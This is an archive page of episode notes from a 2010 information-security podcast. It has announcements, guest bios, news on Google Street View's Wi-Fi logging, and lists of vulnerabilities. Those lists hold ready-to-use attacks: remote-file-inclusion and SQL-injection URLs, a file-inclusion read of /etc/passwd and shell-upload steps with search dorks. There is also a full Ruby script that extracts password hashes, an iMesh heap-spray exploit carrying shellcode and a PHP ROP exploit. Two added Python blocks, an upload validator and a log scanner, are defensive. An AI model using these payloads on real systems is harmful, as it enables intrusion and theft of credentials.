2010
04.30

Episode 120 – Interview with Jason Lawrence

InfoSec Daily Podcast

ISD Podcast Episode 120 for April 30, 2010. This podcast is our contribution back to the community, where we discuss vulnerabilities of interest and information security related news, hopefully providing you a few laughs and a little knowledge.

Announcements:
MyHardDriveDied.com:

  • MHDD Data Recovery Class current dates and locations:
    • San Diego – May 10th-14th
    • San Francisco – June 14th -18th
    • Atlanta – July – 12th-16th
    • Chicago – September – 13th – 17th
    • Dallas, TX – October – 11th – 15th
    • Washington DC – December 6th – 10th
    • Cost is $3500 for all classes. To reserve and register, call (678) 445-9007, email smoulton@nicservices.com or go to http://www.myharddrivedied.com. Use the discount code isdpodcast for a $300 discount.

SANS Community Atlanta:

SANS Mentoring Program:

  • Jason Lawrence will be mentoring the SANS Mentor Forensics 508 – Computer Forensics and Investigations course in Sandy Springs, running Tuesday, June 22, 2010 through Tuesday, August 24, 2010 (http://www.sans.org/mentor/details.php?nid=21538). Use the discount code isdpod15 for a 15% discount.

Atlanta ISSA:

  • The ISSA chapter is hosting a CISSP workshop from May 26 to August 14 (preparing for the August 15, 2010 exam), 6:00 to 9:00 PM, two sessions per week, every Wednesday and Friday, at the Clendenin Building, Kennesaw State University. The CISSP workshop is free of charge to Metro Atlanta ISSA members only. For further information, contact Ben Sholes, Director of Training, at training@gaissa.org.
  • ISSA International Conference – September 16, 2010  (http://www.issa.org/page/?p=105)

North Alabama ISSA:

  • Hosting the second annual North Alabama Cyber Security Summit on June 9th in Huntsville, AL. The event is open to ISSA members at a discounted price ($35; full price is $50).
  • For more information please visit the North Alabama ISSA’s web site at: http://northalabama.issa.org/

Kentuckiana ISSA:

Friends of the Podcast:
Webhosting services: WebSpeedway

Interview with Jason Lawrence. Jason has been in the world of security since 1996, supporting, designing and integrating Microsoft environments and diverse security infrastructures. He holds numerous industry certifications such as CISSP, CISA, GCFA and CEH. He has worked for a large healthcare provider in Israel as team lead in supporting and maintaining the organization’s system and security infrastructure. Currently he works for IBM Internet Security Systems as a Senior Support Engineer for the ISS product portfolio. Jason has also been involved with the ISSA for the past 6 years and currently is the Metro Atlanta Chapter’s Director of Communication. In his free time he mentors the SANS Forensics 508: Computer Forensic Investigations and Incident Response course.

2010
04.29

Episode 119 – Interview with Scott Moulton

InfoSec Daily Podcast

ISD Podcast Episode 119 for April 29, 2010.

Announcements:

The standing announcements (the MyHardDriveDied.com data recovery classes, the SANS Mentor Forensics 508 course, the Atlanta ISSA CISSP workshop and ISSA International Conference, the North Alabama Cyber Security Summit, and WebSpeedway webhosting) are unchanged from Episode 120 above.

Kentuckiana ISSA:
  • 6.5 hour Metasploit class on May 8th, 2010 from 10am to 4:30pm (http://www.irongeek.com/i.php?page=security/louisville-metasploit-class). Apparently there have been some issues with the class RSVPs; as a result, they are working on either responding to the RSVPs, getting a bigger location or, as a last resort, saying sorry to those that don’t get in.


Interview with Scott Moulton. Scott Moulton was the first person arrested for port scanning, in January of 2000. During the defense, Scott found he had to train his lawyers on the technical aspects of computers in order to defend himself. This began his computer forensics career, with a specialty in rebuilding hard drives for investigation purposes. Scott is the President of Forensic Strategy Services, LLC and the owner of My Hard Drive Died. Scott has presented at ShmooCon, OuterZ0ne, DEF CON and Toorcon, and is an active, regular speaker with the DEF CON 404 local chapter.

2010
04.28

Episode 118 – Interview with L. Taylor Banks

InfoSec Daily Podcast

ISD Podcast Episode 118 for April 28, 2010.

Announcements:

The standing announcements (the MyHardDriveDied.com data recovery classes, the SANS Mentor Forensics 508 course, the Atlanta ISSA CISSP workshop and ISSA International Conference, the North Alabama Cyber Security Summit, and WebSpeedway webhosting) are unchanged from Episode 120 above.

Interview with L. Taylor Banks, owner of KnowThreat and administrator and point of contact for the Atlanta DEF CON group DC404. Taylor has been a speaker at DEF CON, Black Hat, ShmooCon, LayerOne, and numerous private events. If you are interested in learning about computing, be sure to check out Taylor’s event Zero to Cloud in 48 Hours.

2010
04.27

Episode 117 – Interview with Everett Washington

InfoSec Daily Podcast

ISD Podcast Episode 117 for April 27, 2010.

Announcements:

The standing announcements (the MyHardDriveDied.com data recovery classes, the SANS Mentor Forensics 508 course, the Atlanta ISSA CISSP workshop and ISSA International Conference, the North Alabama Cyber Security Summit, and WebSpeedway webhosting) are unchanged from Episode 120 above.

Atlanta ISSA:

  • Atlanta SecureWorld Expo, April 27 – 28, 2010, Cobb Galleria Centre (http://www.secureworldexpo.com/events/index.php?id=281)

Interview with Everett Washington Way Professional Services. Everett specializes in building security programs, with a specific focus on security assessments and audits. He has been instrumental in implementing vulnerability and risk management solutions. We get Everett to talk about his experiences and recommendations for building a successful information security program.

2010
04.26

Episode 116

InfoSec Daily Podcast

ISD Podcast Episode 116 for April 26, 2010.

Announcements:

The standing announcements (the MyHardDriveDied.com data recovery classes, the SANS Mentor Forensics 508 course, the Atlanta ISSA CISSP workshop and ISSA International Conference, the North Alabama Cyber Security Summit, and WebSpeedway webhosting) are unchanged from Episode 120 above, and the Atlanta SecureWorld Expo notice is unchanged from Episode 117.

Vulnerabilities of Interest:

    1. Mp3 Online Id Tag Editor is subject to a Remote File Inclusion (RFI) vulnerability. Proof of Concept URL is available:
      http://www.sample.com/mp3/velid3/module.archive.gzip.php?determined_format[include]=http://evil/exploit?
    2. PhpMesFilms is subject to a SQL Injection vulnerability. Version 1.8 is impacted, though others may be as well. Proof of Concept URL is available:
      http://www.sample.com/phpmesfilms_1.8/index.php?id=3+union+select+1,2,3,4,concat(user(),0x3a,@@version),6,7,8,9,10--
    3. Multi-Mirror is subject to a Remote Upload vulnerability. Proof of Concept is available:
      Step 1 – http://www.sample.com/Multi-Mirror/ (select the mirrors to upload to and the file to upload)
      Step 2 – http://www.sample.com/Multi-Mirror/temp_files (after the upload)
    4. Mihalism Multi Host is subject to an Upload vulnerability. Version 4.0.0 is impacted, though others may be as well. Google Dork: "inurl: Mihalis". Proof of Concept is available:
      Step 1 – http://www.sample.com/Mihalis/index.php (use Tamper Data)
      Step 2 – http://www.sample.com/Mihalis/images/02j3gul0lkay3ggoz5ci.php (file name)
    5. Magic Uploader Mini is subject to an Upload vulnerability. Google Dork: "inurl: miniuploader". Proof of Concept is available:
      Step 1 – http://www.sample.com/miniuploader/index.php (use Tamper Data)
      Step 2 – http://www.sample.com/miniuploader/uploads/ (file name)
    6. Almnzm is subject to a SQL Injection vulnerability. Versions older than 2.1 are impacted, though others may be as well. Example URL is available:
      http://www.sample.com/index.php?a=pages&id=3' and 1=0 UnIon aLL Select 1,2,concat(username,0x3a,password),4,5,6,7 from almnzm_customers--%20
    7. Bild Flirt is subject to a SQL Injection vulnerability. Version 1.0 and older are impacted, though others may be as well. Exploit code is available:
      #!/usr/bin/ruby
      #4004-security-project.com
      #Discovered and vulnerability by Easy Laster
      print "
      #########################################################
      #                   4004-Security-Project               #
      #########################################################
      #        Bild Flirt <= version 1.0 SQL Injection        #
      #                          Exploit                      #
      #                  Using Host+Path+userid               #
      #                 www.demo.de /bildflirt/ 1             #
      #                         Easy Laster                   #
      #########################################################
      "

      require 'net/http'
      print "#########################################################"
      print "\nEnter host name (site.com)->"
      host=gets.chomp
      print "#########################################################"
      print "\nEnter script path (/forum/)->"
      path=gets.chomp
      print "#########################################################"
      print "\nEnter user id (userid)->"
      userid=gets.chomp
      print "#########################################################"
      begin
      # Union-based injection: the row is wrapped in ##### markers (0x23) so the
      # selected column can be pulled out of the HTML response with one regex.
      dir = "index.php?id=999999999+and+1=0+union+select+concat(0x23,0x23,0x23,0x23,0x23,name,0x23,0x23,0x23,0x23,0x23)+from+bildf_user+where+user_id="+ userid +"--"
      http = Net::HTTP.new(host, 80)
      resp= http.get(path+dir)
      print "\nThe Username is  -> "+(/#####(.+)#####/).match(resp.body)[1]
      dir = "index.php?id=999999999+and+1=0+union+select+concat(0x23,0x23,0x23,0x23,0x23,passwort,0x23,0x23,0x23,0x23,0x23)+from+bildf_user+where+user_id="+ userid +"--"
      http = Net::HTTP.new(host, 80)
      resp= http.get(path+dir)
      print "\nMD5 Password Hash is -> "+(/#####(.+)#####/).match(resp.body)[1]
      print "\n#########################################################"
      rescue
      print "\nExploit failed"
      end
    8. YUI Images Script is subject to a Shell Upload vulnerability. Version 1.0 is impacted, though others may be as well. Google Dork: "inurl: YUI-upload". Example URLs are available:
      http://www.sample.com/YUI-upload/html (upload a shell named shell.php.giff)
      http://www.sample.com/YUI-upload/html/files/ (your shell.php.giff)
    9. Opentel Openmairie tel is subject to a Local File Inclusion (LFI) vulnerability. Version 1.02 is impacted, though others may be as well. Google Dork: "inurl: scr/soustab". Example URL is available:
      http://www.sample.com/scr/soustab.php?dsn[phptype]=../../../../../../../../etc/passwd%00
    10. Openstock Facture is subject to a Local File Inclusion (LFI) vulnerability. Version 2.02 is impacted, though others may be as well. Google Dork: "inurl: scr/soustab". Example URL is available:
      http://www.sample.com/scr/soustab.php?dsn[phptype]=../../../../../../../../etc/passwd%00
    11. iMesh is subject to a Buffer Overflow vulnerability. Versions older than 7.1.0.x are impacted, though others may be as well. Exploit code is available:
      <html>
      <object classid='clsid:7C3B01BC-53A5-48A0-A43B-0C67731134B9' id='IMWebControl' /></object>
      <SCRIPT>
      //add su one, user: sun pass: tzu
      shellcode = unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u3749%u4949%u4949%u4949%u4949%u4949%u4949%u4949%u5a51%u456a%u5058%u4230%u4231%u6b41%u4141%u3255%u4241%u3241%u4142%u4230%u5841%u3850%u4241%u6d75%u6b39%u494c%u5078%u3344%u6530%u7550%u4e50%u716b%u6555%u6c6c%u614b%u676c%u3175%u6568%u5a51%u4e4f%u306b%u564f%u4c78%u414b%u774f%u4450%u4841%u576b%u4c39%u664b%u4c54%u444b%u7841%u466e%u6951%u4f50%u6c69%u6b6c%u6f34%u3330%u6344%u6f37%u6a31%u646a%u474d%u4871%u7842%u4c6b%u6534%u716b%u5144%u6334%u7434%u5835%u6e65%u736b%u646f%u7364%u5831%u756b%u4c36%u644b%u624c%u6c6b%u634b%u656f%u574c%u7871%u4c6b%u774b%u4c6c%u464b%u7861%u4f6b%u7379%u516c%u3334%u6b34%u7073%u4931%u7550%u4e34%u536b%u3470%u4b70%u4f35%u7030%u4478%u4c4c%u414b%u5450%u4c4c%u624b%u6550%u6c4c%u6e6d%u626b%u6548%u6858%u336b%u6c39%u4f4b%u4e70%u5350%u3530%u4350%u6c30%u704b%u3568%u636c%u366f%u4b51%u5146%u7170%u4d46%u5a59%u6c58%u5943%u6350%u364b%u4230%u7848%u686f%u694e%u3170%u3370%u4d58%u6b48%u6e4e%u346a%u464e%u3937%u396f%u7377%u7053%u426d%u6444%u756e%u5235%u3058%u6165%u4630%u654f%u3133%u7030%u706e%u3265%u7554%u7170%u7265%u5353%u7055%u5172%u5030%u4273%u3055%u616e%u4330%u7244%u515a%u5165%u5430%u526f%u5161%u3354%u3574%u7170%u5736%u4756%u7050%u306e%u7465%u4134%u7030%u706c%u316f%u7273%u6241%u614c%u4377%u6242%u524f%u3055%u6770%u3350%u7071%u3064%u516d%u4279%u324e%u7049%u5373%u5244%u4152%u3371%u3044%u536f%u4242%u6153%u5230%u4453%u5035%u756e%u3470%u506f%u6741%u7734%u4734%u4570");
      // Heap spray: fill ~0x40000-byte blocks with a NOP sled followed by the shellcode
      // so that the address later forced into ECX (0x0d0d0d0d) lands inside a sled.
      bigblock  = unescape("%u9090%u9090");
      headersize = 20;
      slackspace = headersize+shellcode.length;
      while (bigblock.length<slackspace) bigblock+=bigblock;
      fillblock = bigblock.substring(0, slackspace);
      block = bigblock.substring(0, bigblock.length-slackspace);
      while(block.length+slackspace<0x40000) block = block+block+fillblock;
      memory = new Array();
      for (i=0;i<77;i++){memory[i] = block+shellcode}
      bigblock  = unescape("%u0707%u0707");
      while (bigblock.length<slackspace) bigblock+=bigblock;
      fillblock = bigblock.substring(0, slackspace);
      block = bigblock.substring(0, bigblock.length-slackspace);
      while(block.length+slackspace<0x40000) block = block+block+fillblock;
      for (i=77;i<144;i++){memory[i] = block+shellcode}
      bigblock  = unescape("%u0909%u0909");
      while (bigblock.length<slackspace) bigblock+=bigblock;
      fillblock = bigblock.substring(0, slackspace);
      block = bigblock.substring(0, bigblock.length-slackspace);
      while(block.length+slackspace<0x40000) block = block+block+fillblock;
      for (i=144;i<500;i++){memory[i] = block+shellcode}
      </script>
      <script language='vbscript'>
      puf=218959117 'set ecx to 0x0d0d0d0d
      IMWebControl.SetHandler puf
      puf=""
      IMWebControl.ProcessRequestEx puf
      </script>
      </html>

      # milw0rm.com [2007-12-18]
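The upload bugs in this list (items 3, 4, 5 and 8) share one root cause: the server trusts what the client sends about the file. Tamper Data rewrites the request's Content-Type, and a name like shell.php.giff slips past a check that merely looks for an image extension somewhere in the name, while the classic Apache "AddHandler application/x-httpd-php .php" configuration makes mod_mime evaluate every extension in the name, so the file still runs as PHP. The validator below is an added example written for these notes and is not code from any of the listed scripts; it shows, in Python rather than PHP, the checks those scripts lack. The image allow-list, the magic-byte table, the size limit and the storage naming scheme are assumptions for the example, and naive_check is an assumed model of the kind of check the proof-of-concepts defeat, not a copy of any script's code.

```python
import os
import secrets
from typing import Tuple

# Allow-list for the example (an assumption): final extension -> accepted leading bytes.
ALLOWED_IMAGE_TYPES = {
    "gif": (b"GIF87a", b"GIF89a"),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
}

# Extensions a web server may hand to a script engine wherever they appear in the
# name: with "AddHandler application/x-httpd-php .php", Apache's mod_mime looks at
# every extension, so shell.php.giff is still executed as PHP.
SCRIPT_EXTENSIONS = {
    "php", "php3", "php4", "php5", "phtml", "phar", "asp", "aspx", "jsp",
    "cgi", "pl", "py", "sh", "htaccess",
}

MAX_UPLOAD_BYTES = 2 * 1024 * 1024  # assumed limit for the example


def naive_check(filename: str, client_content_type: str) -> bool:
    """Assumed model of the check these proof-of-concepts defeat: trust the
    browser-supplied Content-Type (which Tamper Data rewrites at will) and accept
    any name that contains an image extension somewhere."""
    name = filename.lower()
    return client_content_type.startswith("image/") and any(
        "." + ext in name for ext in ALLOWED_IMAGE_TYPES
    )


def validate_upload(filename: str, data: bytes) -> Tuple[bool, str]:
    """Server-side validation that never consults what the client claims.
    Returns (accepted, reason) on rejection or (True, final_extension) on success."""
    if not data or len(data) > MAX_UPLOAD_BYTES:
        return False, "empty or oversized upload"
    # Drop any directory component the client sent (../, absolute paths, backslashes).
    base = os.path.basename(filename.replace("\\", "/"))
    if base in ("", ".", ".."):
        return False, "no usable file name"
    # Split on every dot so that every extension is inspected, not only the last one.
    parts = base.lower().split(".")
    if len(parts) < 2:
        return False, "no extension"
    extensions = parts[1:]
    for ext in extensions:
        if ext in SCRIPT_EXTENSIONS:
            return False, "script extension in name: " + base
    final_ext = extensions[-1]
    if final_ext not in ALLOWED_IMAGE_TYPES:
        return False, "extension not allowed: " + final_ext
    # Sniff the bytes actually received; the Content-Type header is ignored entirely.
    if not any(data.startswith(magic) for magic in ALLOWED_IMAGE_TYPES[final_ext]):
        return False, "content does not look like " + final_ext
    return True, final_ext


def storage_name(final_ext: str) -> str:
    """Server-chosen name for the stored file: random, carrying only the validated
    image extension. A GIF89a-prefixed PHP polyglot can still pass the sniff, so the
    name the server picks (plus an upload directory with script execution disabled)
    is what keeps such a file inert."""
    return secrets.token_hex(16) + "." + final_ext
```

naive_check("shell.php.giff", "image/gif") returns True, which is exactly the bypass in items 4, 5 and 8; validate_upload rejects the same name before the content is even inspected, and a ".htaccess" upload that would re-enable PHP for .gif files is refused for the same reason. The sniff is a weak signal on its own, which is why the stored name and the upload directory's handler configuration do the real work.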
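Every item in this list except the iMesh overflow leaves a recognisable trace in the web server's access log, because the proof-of-concept URLs carry the payload in the path or query string. The script below is an added example written for these notes, not code from the podcast or from any of the affected projects; it runs signatures distilled from this list (RFI, LFI with traversal and a null byte, union-based SQL injection with the concat/@@version fingerprint, double-extension uploads, and the exposed database and backup paths that also appear in Episode 115's list further down) over a handful of constructed Apache log lines. The log lines, the signature names and the summary format are assumptions for the example; the payload shapes come from the URLs above.

```python
import re
from typing import Dict, List, Optional
from urllib.parse import unquote_plus

# Signatures distilled from the proof-of-concept URLs above (names assumed for the
# example). Each runs against the URL-decoded request path and query string.
SIGNATURES = [
    ("rfi", re.compile(r"[?&][^=&]*=(?:https?|ftp)://", re.I)),
    ("lfi_traversal", re.compile(r"(?:\.\./){2,}|\x00")),
    ("sqli_union", re.compile(r"\bunion\b[\s/*]+(?:all[\s/*]+)?select\b", re.I)),
    ("sqli_fingerprint", re.compile(r"concat\s*\(|@@version|\buser\(\)", re.I)),
    ("upload_double_ext", re.compile(r"\.(?:php\d?|phtml)\.[a-z0-9]{1,5}(?:[?/]|$)", re.I)),
    ("db_backup_path", re.compile(r"\.(?:mdb|sql|bak)(?:$|\?)|/(?:backup|dbaze)/", re.I)),
]

# Apache common/combined log prefix: client, ident, user, timestamp, request line, status, size.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) \S+" (?P<status>\d{3}) (?P<size>\S+)'
)

# Constructed sample log (not real traffic): one benign request, then requests shaped
# like the proof-of-concept URLs from this episode and from Episode 115.
SAMPLE_LOG = [
    '10.0.0.5 - - [26/Apr/2010:10:01:12 -0400] "GET /index.php?page=home HTTP/1.1" 200 5120',
    '203.0.113.7 - - [26/Apr/2010:10:02:44 -0400] "GET /mp3/velid3/module.archive.gzip.php?determined_format[include]=http://203.0.113.7/x.txt? HTTP/1.1" 200 812',
    '203.0.113.7 - - [26/Apr/2010:10:03:01 -0400] "GET /phpmesfilms_1.8/index.php?id=3+union+select+1,2,3,4,concat(user(),0x3a,@@version),6,7,8,9,10-- HTTP/1.1" 200 2310',
    '198.51.100.9 - - [26/Apr/2010:10:05:30 -0400] "GET /scr/soustab.php?dsn[phptype]=../../../../../../../../etc/passwd%00 HTTP/1.1" 200 1403',
    '198.51.100.9 - - [26/Apr/2010:10:06:02 -0400] "GET /YUI-upload/html/files/shell.php.giff?cmd=id HTTP/1.1" 200 77',
    '192.0.2.33 - - [23/Apr/2010:09:11:40 -0400] "GET /My.School/odevsitesi.mdb HTTP/1.1" 200 393216',
    '192.0.2.33 - - [23/Apr/2010:09:12:05 -0400] "GET /admincp/backup/ HTTP/1.1" 403 211',
]


def decode_target(target: str) -> str:
    """Decode twice so %252e%252e-style double encoding cannot hide a traversal;
    unquote_plus also turns '+' into spaces, which the union+select payloads rely on."""
    return unquote_plus(unquote_plus(target))


def scan_line(line: str) -> Optional[Dict]:
    """Parse one log line and return it with the list of signatures it triggers
    (an empty list for benign requests); None if the line is not a log record."""
    m = LOG_LINE.match(line)
    if m is None:
        return None
    decoded = decode_target(m.group("target"))
    hits = [name for name, rx in SIGNATURES if rx.search(decoded)]
    return {
        "ip": m.group("ip"),
        "ts": m.group("ts"),
        "status": int(m.group("status")),
        "target": m.group("target"),
        "hits": hits,
    }


def scan_log(lines) -> List[Dict]:
    """Records that matched at least one signature, in log order."""
    results = []
    for line in lines:
        rec = scan_line(line)
        if rec and rec["hits"]:
            results.append(rec)
    return results


def by_source(results) -> Dict[str, List[str]]:
    """Distinct signature names seen per client address, for quick triage."""
    summary: Dict[str, List[str]] = {}
    for rec in results:
        seen = summary.setdefault(rec["ip"], [])
        for hit in rec["hits"]:
            if hit not in seen:
                seen.append(hit)
    return summary


if __name__ == "__main__":
    for rec in scan_log(SAMPLE_LOG):
        print(rec["ip"], rec["status"], ",".join(rec["hits"]), rec["target"])
```

Run over the sample, the benign request is dropped and each of the six remaining lines is tagged with the signature that matches its payload; by_source then shows that 203.0.113.7 attempted both the RFI and the SQL injection. The 403 on /admincp/backup/ is kept on purpose: a probe for a backup directory is worth knowing about whether or not it succeeded.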

Stories of Interest:

News item 1: http://www.theregister.co.uk/2010/04/22/google_streetview_logs_wlans/

Google’s roving Street View spycam may blur your face, but it’s got your number. The Street View service is under fire in Germany for scanning private WLAN networks, and recording users’ unique MAC (Media Access Control) addresses, as the car trundles along.

Germany’s Federal Commissioner for Data Protection Peter Schaar says he’s “horrified” by the discovery.

“I am appalled… I call upon Google to delete previously unlawfully collected personal data on the wireless network immediately and stop the rides for Street View,” according to German broadcaster ARD.

Spooks have long desired the ability to cross reference the MAC address of a user’s connection with their real identity and virtual identity, such as their Gmail or Facebook account.

Other companies have logged broadcasting WLAN networks and published the information. By contrast Google has not published the WLAN map, or Street View in Germany; Google hopes to launch the service by the end of the year.

It has been publicly known since at least 2008 that companies like Skyhook equip test vehicles to record Wi-Fi networks. Skyhook has offered its Wi-Fi signal and mobile phone data to software developers for years and, according to its own figures, has mapped 80 million Wi-Fi locations worldwide. The first iPhone used Skyhook’s technology to determine the phone’s approximate location from a number of nearby wireless signals. The major difference here is that Skyhook’s data is not made public.

News item 2: http://www.guardian.co.uk/technology/2010/apr/20/google-google-street-view

Google has hit out at state attempts to clamp down on the internet by revealing governments’ requests to remove data from the web and get information about users.

Tonight it released a web page with a map showing country by country where it has had government requests or court orders to remove content from the YouTube video service or its search results, or to provide details about users of its services.

The release of the tool, announced on its official blog, comes as it has had to counter complaints from data protection authorities in 10 countries, including the UK, that its Street View product, which provides pictures of public streets, and its ad-hoc social networking service Buzz “were launched without due consideration of privacy and data protection laws” and that Buzz in particular “betrayed a disappointing disregard for fundamental privacy norms”.

Details provided by Google cover requests between 1 July and 31 December 2009, and show that in the UK there were 1,166 requests for data about users and 59 requests to remove web pages in Google’s services such as YouTube, or from its search results for the web. It complied with 45, or 76%, of the 59 requests, of which 43 were about YouTube videos. It does not specify which government agency – such as the police or others – made the request.

2010
04.23

Episode 115

InfoSec Daily Podcast

ISD Podcast Episode 115 for April 23, 2010.

Announcements:

The standing announcements (the MyHardDriveDied.com data recovery classes, the SANS Mentor Forensics 508 course, the Atlanta SecureWorld Expo, the Atlanta ISSA CISSP workshop and ISSA International Conference, and WebSpeedway webhosting) are unchanged from Episodes 120 and 117 above.

Vulnerabilities of Interest:

    1. Mp3 MuZik is subject to a Database Download vulnerability. Proof of Concept URLs are available:
      http://www.sample.com/Mp3/dbaze/
      http://www.sample.com/Mp3/admin
    2. Games Script (Galore) is subject to a Backup Dump vulnerability. Proof of Concept URLs are available:
      http://www.sample.com/Games Script (Galore)/admincp/backup/
      http://www.sample.com/Games Script (Galore)/admincp/
    3. My School Script is subject to a Backup Dump vulnerability. Proof of Concept URLs are available:
      http://www.sample.com/My.School/odevsitesi.mdb
      http://www.sample.com/My.School/sayac.mdb
      http://www.sample.com/My.School/admin.asp
    4. PHP 6.0 Dev str_transliterate() is subject to a Buffer Overflow vulnerability. Proof of Concept code is available:
      <?php
      /*
      04-06-2010 PHP 6.0 Dev str_transliterate() 0Day Buffer Overflow Exploit
      Tested on Windows 2008 SP1 DEP alwayson
      Matteo Memelli aka ryujin ( AT ) offsec.com
      original sploit: http://www.exploit-db.com/exploits/12051 (Author: Pr0T3cT10n)

      Thx to muts and Elwood for helping ;)

      Bruteforce script is attached in base64 format.

      root@bt:~# ./brute_php6.py 172.16.30.249 /pwnPhp6.php win2k8
      (*) Php6 str_transliterate() bof || ryujin # offsec.com
      (*) Bruteforcing WPM ret address…
      (+) Trying base address 0×78000000
      (+) Trying base address 0×77000000
      (+) Trying base address 0×76000000
      (+) Trying base address 0×75000000
      Microsoft Windows [Version 6.0.6001]
      Copyright (c) 2006 Microsoft Corporation.  All rights reserved.

      C:\wamp\bin\apache\Apache2.2.11>whoami
      whoami
      nt authority\system
      */

      error_reporting(0);

      $base_s = $_GET['pos_s'];
      $base_e = $_GET['pos_e'];
      $off_s  = $_GET['off_s'];
      $off_e  = $_GET['off_e'];

      if(ini_get_bool(‘unicode.semantics’)) {
      $buff    = str_repeat(“\u4141″, 32);
      $tbp     = “\u2650\u6EE5″; // 6EE52650 ADDRESS TO BE PATCHED BY WPM
      $ptw     = “\u2FE0\u6EE5″; // 6EE52FE0 POINTER FOR WRITTEN BYTES
      $ret     = “\u2660\u6EE5″; // 6EE52660 RET AFTER WPM
      $wpmargs = $ret.”\uFFFF\uFFFF”.$tbp.”\uFFFF\uFFFF\uFFFF\uFFFF”.$ptw; // WPM ARGS
      $garbage     = “\$wpm = \”\\u”.strtoupper(sprintf(“%02s”, dechex($off_s))).strtoupper(sprintf(“%02s”, dechex($off_e))).
      “\\u”.strtoupper(sprintf(“%02s”, dechex($base_s))).strtoupper(sprintf(“%02s”, dechex($base_e))).”\”;”;
      eval($garbage);
      $nops    = str_repeat(“\u9090″, 41);

      // TH || ROP -> Try Harder or Rest On Pain ;)
      // GETTING SHELLCODE ABSOLUTE ADDRESS
      $rop  = “\u40dd\u6FF2″;   // MOV EAX,EBP/POP ESI/POP EBP/POP EBX/RETN             6FF240DD
      $rop .= “\u4242\u4242″;   // JUNK POPPED IN EBP
      $rop .= “\u4242\u4242″;   // JUNK POPPED IN EBP
      $rop .= “\u4242\u4242″;   // JUNK POPPED IN EBP
      $rop .= “\u5DD4\u6EE6″;   // POP ECX/RETN                                         6EE65DD4
      $rop .= “\uFDBC\uFFFF”;   // VALUE TO BE POPPED IN ECX (REL. OFFSET TO SHELLCODE) FFFFFDBC
      $rop .= “\u222B\u6EED”;   // ADD EAX,ECX/POP EBX/POP EBP/RETN                     6EED222B
      $rop .= “\u2650\u6EE5″;   // JUNK POPPED IN EBP (RET TO SHELLCODE)
      $rop .= “\u2650\u6EE5″;   // JUNK POPPED IN EBP (RET TO SHELLCODE)

      // PATCHING BUFFER ADDY ARG FOR WPM
      $rop .= “\u1C13\u6EE6″;   // ADD DWORD PTR DS:[EAX],EAX/RETN                      6EE61C13

      // GETTING NUM BYTES IN REGISTER 0x1A0 (LEN OF SHELLCODE)
      $rop .= “\uE94E\u6EE6″;   // MOV EDX,ECX/POP EBP/RETN                             6EE6E94E
      $rop .= “\u4242\u4242″;   // JUNK POPPED IN EBP
      $rop .= “\u5DD4\u6EE6″;   // POP ECX/RETN                                         6EE65DD4
      $rop .= “\uFF5C\uFFFF”;   // VALUE TO BE POPPED IN ECX                            FFFFFF5C
      $rop .= “\uE94C\u6EE6″;   // SUB ECX,EDX/MOV EDX,ECX/POP EBP/RETN                 6EE6E94C
      $rop .= “\u4242\u4242″;   // JUNK POPPED IN EBP

      // PATCHING NUM BYTES TO BE COPIED ARG FOR WPM
      $rop .= “\u0C54\u6EE7″;   // MOV DWORD PTR DS:[EAX+4],ECX/POP EBP/RETN            6EE70C54
      $rop .= “\u4242\u4242″;   // JUNK POPPED IN EBP

      // REALIGNING ESP TO WPM AND RETURNING TO IT
      $rop .= “\u8640\u6EE6″;   // ADD EAX,-30/POP EBP/RETN                             6EE68640
      $rop .= “\u4242\u4242″;   // JUNK POPPED IN EBP
      $rop .= “\u29F1\u6EE6″;   // ADD EAX,0C/POP EBP/RETN                              6EE629F1
      $rop .= “\u4242\u4242″;   // JUNK POPPED IN EBP
      $rop .= “\u29F1\u6EE6″;   // ADD EAX,0C/POP EBP/RETN                              6EE629F1
      $rop .= “\u4242\u4242″;   // JUNK POPPED IN EBP
      $rop .= “\u10AD\u6FC3″;   // INC EAX/RETN                                         6FC310AD
      $rop .= “\u10AD\u6FC3″;   // INC EAX/RETN                                         6FC310AD
      $rop .= “\u10AD\u6FC3″;   // INC EAX/RETN                                         6FC310AD
      $rop .= “\u10AD\u6FC3″;   // INC EAX/RETN                                         6FC310AD
      $rop .= “\u10AD\u6FC3″;   // INC EAX/RETN                                         6FC310AD
      $rop .= “\u10AD\u6FC3″;   // INC EAX/RETN                                         6FC310AD
      $rop .= “\u10AD\u6FC3″;   // INC EAX/RETN                                         6FC310AD
      $rop .= “\u10AD\u6FC3″;   // INC EAX/RETN                                         6FC310AD
      $rop .= “\u2C63\u6FC5″;   // XCHG EAX,ESP/RETN                                    6FC52C63

      // unicode bind shellcode port 4444, 318 bytes (the $sh byte string is omitted here)

      $exploit = $buff.$ret.$wpm.$wpmargs.$nops.$sh.$rop;
      str_transliterate(0, $exploit, 0);
      } else {
          exit("Error! 'unicode.semantics' has to be on!\r\n");
      }

      // Interpret a php.ini setting as a boolean ("on"/"yes"/"true", "stdout"/"stderr" for display_errors, or a numeric value).
      function ini_get_bool($a) {
          $b = ini_get($a);
          switch (strtolower($b)) {
              case 'on':
              case 'yes':
              case 'true':
                  return 'assert.active' !== $a;
              case 'stdout':
              case 'stderr':
                  return 'display_errors' === $a;
              default:
                  return (bool) (int) $b;
          }
      }

      ?>

    5. Joomla Component QPersonel is subject to a SQL Injection vulnerability. Versions older than 1.02 are impacted, though others may be as well.  Google Dork “inurl:option=com_qpersonel”.  Example URL is available:  http://www.sample.com/index.php?option=com_qpersonel&task=qpListele&katid=XX+AND+1=2+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,concat(database(),user())--
    6. VMware Remote Console is subject to a format string vulnerability. Version 4.0 is impacted, though others may be as well.  Example code is available:
      Create a shortcut: C:\Program Files\Common Files\VMware\VMware Remote Console Plug-in>vmware-vmrc.exe -u vmware_user -h HOST -M AAAA:%x.%x.%x.%x.:BBBB

      VMDlg::ShowDialog: Error opening the remote virtual machine
      HOST\AAAA:3455600.78138a94.100012b2.28e27b0.:BBBB:

      Example (ActiveX): objectVMRC.connect ("host", "username", "password",
      "%x:%x:%x:%x:%x:%x:%x:%x:%x", "X", 2);

    7. Magneto Software ActiveX Control is subject to an ICMP Crash Denial of Service vulnerability. Example code is available:
      <html>
      <object classid='clsid:B5ED1577-4576-11D5-851F-00D0B7A934F6' id='target'></object>
      <script language='vbscript'>
      'Magneto Software ActiveX Control ICMP Crash POC
      'Discovered by:  s4squatch
